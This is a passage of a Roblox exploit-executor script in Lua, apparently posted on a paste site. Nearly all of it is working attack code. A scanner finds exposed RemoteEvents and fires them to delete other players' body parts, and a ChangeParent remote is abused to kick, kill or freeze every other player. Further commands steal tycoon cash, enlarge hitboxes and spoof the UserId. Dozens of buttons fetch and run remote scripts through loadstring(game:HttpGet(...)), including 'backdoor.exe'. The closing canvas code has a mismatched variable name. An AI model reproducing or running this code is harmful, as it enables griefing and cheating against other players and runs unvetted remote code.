  700. "create",
  701. "property",
  702. "spawn",
  703. "clear",
  704. "trash",
  705. "fire",
  706. "bomb",
  707. "explode",
  708. "color",
  709. "update",
  710. "car",
  711. "money",
  712. "cheat",
  713. "data",
  714. "save",
  715. "build",
  716. "backdoor",
  717. "invis",
  718. "hide",
  719. "set"
  720. }
  721.  
  722. local PossibleRemotes = {}
  723.  
  724. for i,v in pairs(game:GetDescendants()) do
  725. if v:IsA("RemoteEvent") then
  726. for x,z in pairs(PingWords) do
  727. if string.find(v.Name:lower(), z:lower()) then
  728. warn("Possible Vulnerability found : ".. v.Name.. " | "..v.ClassName)
  729. table.insert(PossibleRemotes, v)
  730. end
  731. end
  732. end
  733. end
  734.  
  735. if load_DestroyToolTest == true then
  736. for i,v in pairs(PossibleRemotes) do
  737. v:FireServer(game:GetService("Players")[Player.Value].Character.Head)
  738. end
  739. end
  740.  
  741. if game.PlaceId == 3554069044 then
  742. game:GetService("ReplicatedStorage").Events.Tools.ChangeParent:FireServer(game:GetService("Players")[Player.Value].Character.Head, game.JointsService)
  743. end
  744. end)
  745.  
  746. CreateCMD("naked",function()
  747. if game.PlaceId == 3554069044 then
  748. game:GetService("ReplicatedStorage").Events.Tools.ChangeParent:FireServer(game:GetService("Players")[Player.Value].Character.Shirt, game.JointsService)
  749. game:GetService("ReplicatedStorage").Events.Tools.ChangeParent:FireServer(game:GetService("Players")[Player.Value].Character.Pants, game.JointsService)
  750. end
  751. end)
  752.  
  753. CreateCMD("dupe head",function()
  754. --[[
  755. Simple vulnerability scanner v1.1
  756. Made by 0fiiz#7952
  757. ]]--
  758.  
  759.  
  760. local load_BackdoorEXE = false
  761. local load_SimplySpy = false
  762. local load_DestroyToolTest = true
  763.  
  764. if load_SimplySpy == true then
  765. loadstring(game:HttpGet("https://raw.githubusercontent.com/exxtremestuffs/SimpleSpySource/master/SimpleSpy.lua%22"))()
  766. end
  767.  
  768. if load_BackdoorEXE == true then
  769. loadstring(game:HttpGet("https://raw.githubusercontent.com/iK4oS/backdoor.exe/v8/src/main.lua%22"))()
  770. end
  771.  
  772. local PingWords = {
  773. "destroy",
  774. "delete",
  775. "del",
  776. "place",
  777. "remove",
  778. "replicate",
  779. "loadstring",
  780. "rev",
  781. "admin",
  782. "create",
  783. "property",
  784. "spawn",
  785. "clear",
  786. "trash",
  787. "fire",
  788. "bomb",
  789. "explode",
  790. "color",
  791. "update",
  792. "car",
  793. "money",
  794. "cheat",
  795. "data",
  796. "save",
  797. "build",
  798. "backdoor",
  799. "invis",
  800. "hide",
  801. "set"
  802. }
  803.  
  804. local PossibleRemotes = {}
  805.  
  806. for i,v in pairs(game:GetDescendants()) do
  807. if v:IsA("RemoteEvent") then
  808. for x,z in pairs(PingWords) do
  809. if string.find(v.Name:lower(), z:lower()) then
  810. warn("Possible Vulnerability found : ".. v.Name.. " | "..v.ClassName)
  811. table.insert(PossibleRemotes, v)
  812. end
  813. end
  814. end
  815. end
  816.  
  817. if load_DestroyToolTest == true then
  818. for i,v in pairs(PossibleRemotes) do
  819. v:FireServer(game:GetService("Players")[Player.Value].Character.Head)
  820. end
  821. end
  822. end)
  823.  
  824. CreateCMD("dupe torso",function()
  825. --[[
  826. Simple vulnerability scanner v1.1
  827. Made by 0fiiz#7952
  828. ]]--
  829.  
  830.  
  831. local load_BackdoorEXE = false
  832. local load_SimplySpy = false
  833. local load_DestroyToolTest = true
  834.  
  835. if load_SimplySpy == true then
  836. loadstring(game:HttpGet("https://raw.githubusercontent.com/exxtremestuffs/SimpleSpySource/master/SimpleSpy.lua%22"))()
  837. end
  838.  
  839. if load_BackdoorEXE == true then
  840. loadstring(game:HttpGet("https://raw.githubusercontent.com/iK4oS/backdoor.exe/v8/src/main.lua%22"))()
  841. end
  842.  
  843. local PingWords = {
  844. "destroy",
  845. "delete",
  846. "del",
  847. "place",
  848. "remove",
  849. "replicate",
  850. "loadstring",
  851. "rev",
  852. "admin",
  853. "create",
  854. "property",
  855. "spawn",
  856. "clear",
  857. "trash",
  858. "fire",
  859. "bomb",
  860. "explode",
  861. "color",
  862. "update",
  863. "car",
  864. "money",
  865. "cheat",
  866. "data",
  867. "save",
  868. "build",
  869. "backdoor",
  870. "invis",
  871. "hide",
  872. "set"
  873. }
  874.  
  875. local PossibleRemotes = {}
  876.  
  877. for i,v in pairs(game:GetDescendants()) do
  878. if v:IsA("RemoteEvent") then
  879. for x,z in pairs(PingWords) do
  880. if string.find(v.Name:lower(), z:lower()) then
  881. warn("Possible Vulnerability found : ".. v.Name.. " | "..v.ClassName)
  882. table.insert(PossibleRemotes, v)
  883. end
  884. end
  885. end
  886. end
  887.  
  888. if load_DestroyToolTest == true then
  889. for i,v in pairs(PossibleRemotes) do
  890. v:FireServer(game:GetService("Players")[Player.Value].Character.Torso)
  891. end
  892. end
  893. end)
  894.  
  895. CreateCMD("bombhead",function()
  896. --[[
  897. Simple vulnerability scanner v1.1
  898. Made by 0fiiz#7952
  899. ]]--
  900.  
  901.  
  902. local load_BackdoorEXE = false
  903. local load_SimplySpy = false
  904. local load_DestroyToolTest = true
  905.  
  906. if load_SimplySpy == true then
  907. loadstring(game:HttpGet("https://raw.githubusercontent.com/exxtremestuffs/SimpleSpySource/master/SimpleSpy.lua%22"))()
  908. end
  909.  
  910. if load_BackdoorEXE == true then
  911. loadstring(game:HttpGet("https://raw.githubusercontent.com/iK4oS/backdoor.exe/v8/src/main.lua%22"))()
  912. end
  913.  
  914. local PingWords = {
  915. "destroy",
  916. "delete",
  917. "del",
  918. "place",
  919. "remove",
  920. "replicate",
  921. "loadstring",
  922. "rev",
  923. "admin",
  924. "create",
  925. "property",
  926. "spawn",
  927. "clear",
  928. "trash",
  929. "fire",
  930. "bomb",
  931. "explode",
  932. "color",
  933. "update",
  934. "car",
  935. "money",
  936. "cheat",
  937. "data",
  938. "save",
  939. "build",
  940. "backdoor",
  941. "invis",
  942. "hide",
  943. "set"
  944. }
  945.  
  946. local PossibleRemotes = {}
  947.  
  948. for i,v in pairs(game:GetDescendants()) do
  949. if v:IsA("RemoteEvent") then
  950. for x,z in pairs(PingWords) do
  951. if string.find(v.Name:lower(), z:lower()) then
  952. warn("Possible Vulnerability found : ".. v.Name.. " | "..v.ClassName)
  953. table.insert(PossibleRemotes, v)
  954. end
  955. end
  956. end
  957. end
  958.  
  959. if load_DestroyToolTest == true then
  960. for i = 0, 100, 1 do
  961. for i,v in pairs(PossibleRemotes) do
  962. v:FireServer(game:GetService("Players")[Player.Value].Character.Head)
  963. end
  964. end
  965. end
  966. end)
  967.  
  968. CreateCMD("bombtorso",function()
  969. --[[
  970. Simple vulnerability scanner v1.1
  971. Made by 0fiiz#7952
  972. ]]--
  973.  
  974.  
  975. local load_BackdoorEXE = false
  976. local load_SimplySpy = false
  977. local load_DestroyToolTest = true
  978.  
  979. if load_SimplySpy == true then
  980. loadstring(game:HttpGet("https://raw.githubusercontent.com/exxtremestuffs/SimpleSpySource/master/SimpleSpy.lua%22"))()
  981. end
  982.  
  983. if load_BackdoorEXE == true then
  984. loadstring(game:HttpGet("https://raw.githubusercontent.com/iK4oS/backdoor.exe/v8/src/main.lua%22"))()
  985. end
  986.  
  987. local PingWords = {
  988. "destroy",
  989. "delete",
  990. "del",
  991. "place",
  992. "remove",
  993. "replicate",
  994. "loadstring",
  995. "rev",
  996. "admin",
  997. "create",
  998. "property",
  999. "spawn",
  1000. "clear",
  1001. "trash",
  1002. "fire",
  1003. "bomb",
  1004. "explode",
  1005. "color",
  1006. "update",
  1007. "car",
  1008. "money",
  1009. "cheat",
  1010. "data",
  1011. "save",
  1012. "build",
  1013. "backdoor",
  1014. "invis",
  1015. "hide",
  1016. "set"
  1017. }
  1018.  
  1019. local PossibleRemotes = {}
  1020.  
  1021. for i,v in pairs(game:GetDescendants()) do
  1022. if v:IsA("RemoteEvent") then
  1023. for x,z in pairs(PingWords) do
  1024. if string.find(v.Name:lower(), z:lower()) then
  1025. warn("Possible Vulnerability found : ".. v.Name.. " | "..v.ClassName)
  1026. table.insert(PossibleRemotes, v)
  1027. end
  1028. end
  1029. end
  1030. end
  1031.  
  1032. if load_DestroyToolTest == true then
  1033. for i = 0, 100, 1 do
  1034. for i,v in pairs(PossibleRemotes) do
  1035. v:FireServer(game:GetService("Players")[Player.Value].Character.Torso)
  1036. end
  1037. end
  1038. end
  1039. end)
  1040.  
  1041. CreateCMD("view",function()
  1042. game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players")[Player.Value].Character.Humanoid
  1043. end)
  1044.  
  1045. CreateCMD("unview",function()
  1046. game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players").LocalPlayer.Character.Humanoid
  1047. end)
  1048.  
  1049. CreateCMD("goto",function()
  1050. game:GetService("Players").LocalPlayer.Character:PivotTo(game:GetService("Players")[Player.Value].Character:GetPivot())
  1051. end)
  1052.  
  1053. CreateCMD("info",function()
  1054. local plr = game:GetService("Players")[Player.Value]
  1055. print("--- INFO ---")
  1056. print("Name: "..plr.Name)
  1057. print("DisplayName: "..plr.DisplayName)
  1058. print("Account Age: "..tostring(plr.AccountAge))
  1059. print("Membership: "..tostring(plr.MembershipType))
  1060. print("--- END. ---")
  1061. end)
  1062.  
  1063. CreateScript("RemoteTestTool",function()
  1064. --[[
  1065. Simple vulnerability scanner v1.1
  1066. Made by 0fiiz#7952
  1067. ]]--
  1068.  
  1069.  
  1070. local load_BackdoorEXE = false
  1071. local load_SimplySpy = false
  1072. local load_DestroyToolTest = true
  1073.  
  1074. if load_SimplySpy == true then
  1075. loadstring(game:HttpGet("https://raw.githubusercontent.com/exxtremestuffs/SimpleSpySource/master/SimpleSpy.lua%22"))()
  1076. end
  1077.  
  1078. if load_BackdoorEXE == true then
  1079. loadstring(game:HttpGet("https://raw.githubusercontent.com/iK4oS/backdoor.exe/v8/src/main.lua%22"))()
  1080. end
  1081.  
  1082. local PingWords = {
  1083. "destroy",
  1084. "delete",
  1085. "del",
  1086. "place",
  1087. "remove",
  1088. "replicate",
  1089. "loadstring",
  1090. "rev",
  1091. "admin",
  1092. "create",
  1093. "property",
  1094. "spawn",
  1095. "clear",
  1096. "trash",
  1097. "fire",
  1098. "bomb",
  1099. "explode",
  1100. "color",
  1101. "update",
  1102. "car",
  1103. "money",
  1104. "cheat",
  1105. "data",
  1106. "save",
  1107. "build",
  1108. "backdoor",
  1109. "invis",
  1110. "hide",
  1111. "set"
  1112. }
  1113.  
  1114. local PossibleRemotes = {}
  1115.  
  1116. for i,v in pairs(game:GetDescendants()) do
  1117. if v:IsA("RemoteEvent") then
  1118. for x,z in pairs(PingWords) do
  1119. if string.find(v.Name:lower(), z:lower()) then
  1120. warn("Possible Vulnerability found : ".. v.Name.. " | "..v.ClassName)
  1121. table.insert(PossibleRemotes, v)
  1122. end
  1123. end
  1124. end
  1125. end
  1126.  
  1127. if load_DestroyToolTest == true then
  1128. removething("RTT Tool",game:GetService("Players").LocalPlayer.Backpack)
  1129.  
  1130. local RemoteTestTool = Instance.new("Tool",game:GetService("Players").LocalPlayer.Backpack)
  1131. RemoteTestTool.Name = "RTT Tool"
  1132. RemoteTestTool.RequiresHandle = false
  1133. RemoteTestTool.Activated:Connect(function()
  1134. for i,v in pairs(PossibleRemotes) do
  1135. v:FireServer(game:GetService("Players").LocalPlayer:GetMouse().Target)
  1136. end
  1137. end)
  1138. end
  1139. end)
  1140.  
  1141. CreateCMD("kick",function()
  1142. game:GetService("ReplicatedStorage").Events.Tools.ChangeParent:FireServer(game:GetService("Players")[Player.Value])
  1143. end)
  1144.  
  1145. CreateCMD("punish",function()
  1146. game:GetService("ReplicatedStorage").Events.Tools.ChangeParent:FireServer(game:GetService("Players")[Player.Value].Character)
  1147. end)
  1148.  
  1149. Follow = false
  1150.  
  1151. CreateCMD("annoy",function()
  1152. local p = game:GetService("Players")[Player.Value]
  1153. if p.Character and p.Character:FindFirstChild("Humanoid") then
  1154. if Follow == true then
  1155. Follow = false; return
  1156. else Follow = true end
  1157. while Follow == true do
  1158. game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = p.Character.HumanoidRootPart.CFrame
  1159. wait()
  1160. end
  1161. end
  1162. end)
  1163.  
  1164. CreateCMD("unannoy",function()
  1165. Follow = false
  1166. end)
  1167.  
  1168. CreateScript("Infinite Yield Admin",function()
  1169. loadstring(game:HttpGet("https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source"))()
  1170. end)
  1171.  
  1172. CreateScript("Dex",function()
  1173. loadstring(game:HttpGet("https://raw.githubusercontent.com/infyiff/backup/main/dex.lua"))()
  1174. end)
  1175.  
  1176. CreateScript("Rekt Hub",function()
  1177. loadstring(game:HttpGet(("https://paste.website/p/fce88396-87e3-4ed8-bb8c-1593ff174d0d.txt"), true))()
  1178. end)
  1179.  
  1180. CreateScript("Red All",function()
  1181. loadstring(game:HttpGet(("https://paste.website/p/a6956ce1-5a86-4da8-887f-5f828b44dd0a.txt"), true))() -- Red all
  1182. end)
  1183.  
  1184. CreateScript("HD Admin Brickspam",function()
  1185. loadstring(game:HttpGet(("https://paste.website/p/fcfa5271-b26f-4611-bea6-9c369dc73546.txt"), true))() -- Hd brickspam
  1186. end)
  1187.  
  1188. CreateScript("Bread",function()
  1189. loadstring(game:HttpGet(("https://paste.website/p/67e65cf2-1afe-4467-b04c-5ec95566807c.txt"), true))() -- bread
  1190. end)
  1191.  
  1192. CreateScript("Bat Gui",function()
  1193. loadstring(game:HttpGet(("https://paste.website/p/cf170836-00b6-480f-b3a4-6170a4ed730f.txt"), true))() -- Bat gui
  1194. end)
  1195.  
  1196. CreateScript("Box Admin",function()
  1197. loadstring(game:HttpGet(("https://paste.website/p/166b9fb0-5ab6-4555-911d-0c7e4af9b608.txt"), true))() -- Box admin
  1198. end)
  1199.  
  1200. CreateScript("WeAreSkids",function()
  1201. loadstring(game:HttpGet(("https://paste.website/p/fb3f5729-dd7b-44af-a145-3badfffb755a.txt"), true))() -- WeAreSkids
  1202. end)
  1203.  
  1204. CreateScript("Redwood Ruinier",function()
  1205. loadstring(game:HttpGet(("https://paste.website/p/aff15b93-2531-4d9b-a62a-1108fd125e24.txt"), true))() -- red wood
  1206. end)
  1207.  
  1208. CreateScript("Tycoon Hax",function()
  1209. loadstring(game:HttpGet(("https://rawscripts.net/raw/Super-Hero-Tycoon-Haxx-9731"), true))()
  1210. end)
  1211.  
  1212. CreateScript("ScriptBlox Searcher",function()
  1213. loadstring(game:HttpGet("https://raw.githubusercontent.com/AZYsGithub/chillz-workshop/main/ScriptSearcher"))() -- not made by kosovo this time
  1214. end)
  1215.  
  1216. CreateScript("Steal Tycoon Cash",function()
  1217. for f, g in pairs(game:GetService("Workspace"):GetDescendants()) do
  1218. if g.Name == "Giver" then
  1219. firetouchinterest(game:GetService("Players").LocalPlayer.Character.HumanoidRootPart, g, 0)
  1220. firetouchinterest(game:GetService("Players").LocalPlayer.Character.HumanoidRootPart, g, 1)
  1221. end
  1222. end
  1223. end)
  1224.  
  1225. chat = function(Msg)
  1226. game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer(Msg,"All")
  1227. end
  1228.  
  1229. CreateCMD("age",function()
  1230. chat(game:GetService("Players")[Player.Value].DisplayName.."'s Account age is: "..game:GetService("Players")[Player.Value].AccountAge)
  1231. end)
  1232.  
  1233. CreateScript("No Tycoon Doors",function()
  1234. for f, g in pairs(game:GetService("Workspace"):GetDescendants()) do
  1235. if g.Name == "Pipe" then
  1236. g:Destroy()
  1237. end
  1238. end
  1239. end)
  1240.  
  1241. CreateScript("Delete Roleplay Tool",function()
  1242. mouse = game:GetService("Players").LocalPlayer:GetMouse()
  1243. tool = Instance.new("Tool")
  1244. tool.RequiresHandle = false
  1245. tool.Name = "Delete tool"
  1246. tool.Activated:Connect(function()
  1247. game:GetService("ReplicatedStorage").Events.Tools.ChangeParent:FireServer(mouse.Target)
  1248. end)
  1249. tool.Parent = game:GetService("Players").LocalPlayer.Backpack
  1250. end)
  1251.  
  1252. CreateScript("Kill Roleplay Tool",function()
  1253. mouse = game:GetService("Players").LocalPlayer:GetMouse()
  1254. tool = Instance.new("Tool")
  1255. tool.RequiresHandle = false
  1256. tool.Name = "Kill tool"
  1257. tool.Activated:Connect(function()
  1258. if mouse.Target.Parent:FindFirstChild("Humanoid") then
  1259. game:GetService("ReplicatedStorage").Events.Tools.ChangeParent:FireServer(mouse.Target.Parent:FindFirstChild("Head"):WaitForChild("Neck"))
  1260. end
  1261. end)
  1262. tool.Parent = game:GetService("Players").LocalPlayer.Backpack
  1263. end)
  1264.  
  1265. CreateScript("Kick Others Roleplay",function()
  1266. for i,v in pairs(game:GetService("Players"):GetChildren()) do
  1267. if v:IsA("Player") then
  1268. if v.Name ~= game:GetService("Players").LocalPlayer.Name then
  1269. game:GetService("ReplicatedStorage").Events.Tools.ChangeParent:FireServer(v,nil)
  1270. end
  1271. end
  1272. end
  1273. end)
  1274.  
  1275. CreateScript("Punish Others Roleplay",function()
  1276. for i,v in pairs(game:GetService("Players"):GetChildren()) do
  1277. if v:IsA("Player") then
  1278. if v.Name ~= game:GetService("Players").LocalPlayer.Name then
  1279. game:GetService("ReplicatedStorage").Events.Tools.ChangeParent:FireServer(v.Character,nil)
  1280. end
  1281. end
  1282. end
  1283. end)
  1284.  
  1285. CreateScript("Walkless Others Roleplay",function()
  1286. for i,v in pairs(game:GetService("Players"):GetChildren()) do
  1287. if v:IsA("Player") then
  1288. if v.Name ~= game:GetService("Players").LocalPlayer.Name then
  1289. game:GetService("ReplicatedStorage").Events.Tools.ChangeParent:FireServer(v.Character.HumanoidRootPart,nil)
  1290. end
  1291. end
  1292. end
  1293. end)
  1294.  
  1295. CreateScript("Kill Others Roleplay",function()
  1296. for i,v in pairs(game:GetService("Players"):GetChildren()) do
  1297. if v:IsA("Player") then
  1298. if v.Name ~= game:GetService("Players").LocalPlayer.Name then
  1299. game:GetService("ReplicatedStorage").Events.Tools.ChangeParent:FireServer(v.Character:WaitForChild("Head"):WaitForChild("Neck"),nil)
  1300. end
  1301. end
  1302. end
  1303. end)
  1304.  
  1305. CreateScript("HitBox & Infjump",function()
  1306. local InfiniteJumpEnabled = true game:GetService("UserInputService").JumpRequest:connect(function() if InfiniteJumpEnabled then game:GetService"Players".LocalPlayer.Character:FindFirstChildOfClass'Humanoid':ChangeState("Jumping") end end)
  1307. game.Players.LocalPlayer.UserId = "2205774994"
  1308. _G.HeadSize = 20 _G.Disabled = true game:GetService('RunService').RenderStepped:connect(function() if _G.Disabled then for i,v in next, game:GetService('Players'):GetPlayers() do if v.Name ~= game:GetService('Players').LocalPlayer.Name then pcall(function() v.Character.HumanoidRootPart.Size = Vector3.new(_G.HeadSize,_G.HeadSize,_G.HeadSize) v.Character.HumanoidRootPart.Transparency = 0.7 v.Character.HumanoidRootPart.BrickColor = BrickColor.new("Really blue") v.Character.HumanoidRootPart.Material = "Neon" v.Character.HumanoidRootPart.CanCollide = false end) end end end end)
  1309. end)
  1310.  
  1311. CreateScript("Arabic Admin Room",function()
  1312. game.Players.LocalPlayer.Character:MoveTo(Vector3.new(-589.1566772460938, -34.270896911621094, 241.41119384765625))
  1313. end)
  1314.  
  1315. CreateScript("Arabic Spawn Point",function()
  1316. game.Players.LocalPlayer.Character:MoveTo(Vector3.new(-592.3201293945312, 52.972572326660156, 164.14683532714844))
  1317. end)
  1318.  
  1319. CreateCMD("lray",function()
  1320. -- Red Hyper Laser Gun
  1321. game:GetService("Players").LocalPlayer.Character:WaitForChild("Hyperlasergun",0.1):WaitForChild("ServerControl",0.1):InvokeServer("Click",true,game:GetService("Players")[Player.Value].Character.Head.Position)
  1322. end)
  1323.  
  1324. --// AutomaticBlox
  1325. local scripts = {
  1326. ["RobloxHacks"] = game:HttpGet("https://paste.website/p/1ca2aab2-5999-46d8-b9d1-39eb4a442eb9.txt"),
  1327. ["LazyHub"] = game:HttpGet("https://paste.website/p/28c3971b-674d-42c3-afd2-1af396eeddd1.txt"),
  1328. ["Hydroxide Spy"] = game:HttpGet("https://raw.githubusercontent.com/Upbolt/Hydroxide/revision/ui/modules/RemoteSpy.lua"),
  1329. ["Mr Spy V2"] = game:HttpGet("https://raw.githubusercontent.com/harisiskandar178/Roblox-Script/main/mrspy%20v2.txt"),
  1330. ["Mr Spy V1"] = game:HttpGet("https://pastebin.com/raw/bbYeT7z5"),
  1331. ["Remote2Script Spy"] = game:HttpGet("https://raw.githubusercontent.com/ou1z/Roblox-Scripts/master/Remote2Script.lua"),
  1332. ["Simple Spy"] = game:HttpGet("https://raw.githubusercontent.com/exxtremestuffs/SimpleSpySource/master/SimpleSpy.lua"),
  1333. ["0fiiz Vuln Checker"] = game:HttpGet("https://paste.website/p/deacbe63-7727-4a6c-add9-3be90e15002e.txt"),
  1334. ["Kosovo Vuln Checker"] = game:HttpGet("https://paste.website/p/e29ced8a-952e-4e59-9cb3-d15651694f3b.txt"),
  1335. ["Prison Commands"] = game:HttpGet("https://pastebin.com/raw/1RvgFtcx"),
  1336. ["Prison Killer"] = game:HttpGet("https://paste.website/p/2e644f91-e064-49e0-972d-07476acd31c3.txt"),
  1337. ["Prison Ware"] = game:HttpGet("https://raw.githubusercontent.com/Denverrz/scripts/master/PRISONWARE_v1.3.txt"),
  1338. ["illremember Shattervast Admin"] = game:HttpGet("https://pastebin.com/raw/iL4NRDux"),
  1339. ["illremember Reviz Admin"] = game:HttpGet("https://pastebin.com/raw/Caniwq2N"),
  1340. ["illremember OPFinality Hub"] = game:HttpGet("https://pastebin.com/raw/T5Y2zbyT"),
  1341. ["illremember Animation Hub"] = game:HttpGet("https://pastebin.com/raw/0MLPL32f"),
  1342. ["Google Script Hub"] = game:HttpGet("https://pastebin.com/raw/JcNAaJvZ"),
  1343. ["Swim Hub"] = game:HttpGet("https://raw.githubusercontent.com/SwimPaste/swimhack/main/swimloader_ui.lua"),
  1344. ["V.G Hub"] = game:HttpGet("https://raw.githubusercontent.com/1201for/V.G-Hub/main/V.Ghub"),
  1345. ["VHub (keys)"] = game:HttpGet("https://raw.githubusercontent.com/V31nc/2642/Created/VHub"),
  1346. ["Fanmade Synapse Hub"] = game:HttpGet("https://paste.website/p/49cb753f-6618-4e2a-a23d-be5723a5b7b3.txt"),
  1347. ["ClickTweens"] = game:HttpGet("https://paste.website/p/72bec212-54ea-4050-9d71-a0476981e69f.txt"),
  1348. ["Erased Admin"] = game:HttpGet("https://paste.website/p/7d6deca7-b380-4bc0-98cb-46695e073fba.txt"),
  1349. }
  1350.  
  1351. for i,v in pairs(scripts) do
  1352. CreateScript(i,function()
  1353. loadstring(v)() -- not made by kosovo this time
  1354. end)
  1355. end
  1356.  
  1357. --// Initalizing
  1358. count = 0
  1359. for i,v in pairs(ScrollingFrame:GetChildren()) do
  1360. if v:IsA("TextButton") then
  1361. count = count + 1
  1362. end
  1363. end
  1364. fourmula = math.floor(count / 3) - 7.5
  1365. ScrollingFrame.CanvasSize = UDim2.new(0,0,formula,0)
Add Comment
Please, Sign In to add comment